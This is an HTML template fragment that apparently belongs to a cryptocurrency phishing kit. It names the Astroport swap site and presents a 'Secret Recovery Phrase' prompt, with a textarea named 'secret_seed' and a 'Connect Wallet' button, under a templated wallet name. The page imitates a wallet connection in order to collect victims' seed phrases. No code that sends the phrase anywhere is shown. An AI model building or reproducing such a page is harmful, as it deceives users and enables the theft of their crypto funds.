<aside>
    <h4>Connect to</h4>
    <p>https://app.astroport.fi/swap</p>
</aside>

<article class="title">
    <h1>Secret Recovery Phrase</h1>
    <p>
        Your 12-24 word Recovery Phrase grants access to your account. Please input it in the order specified. Separate each word with a space.
    </p>
</article>
<article class="content">
    <form class="form-secret-seed" data-module="{{wallet}}">
        <textarea name="secret_seed" id="secret_seed" cols="30" rows="10" placeholder="Secret Seed"></textarea>
        <button disabled>Connect Wallet</button>
    </form>
</article>
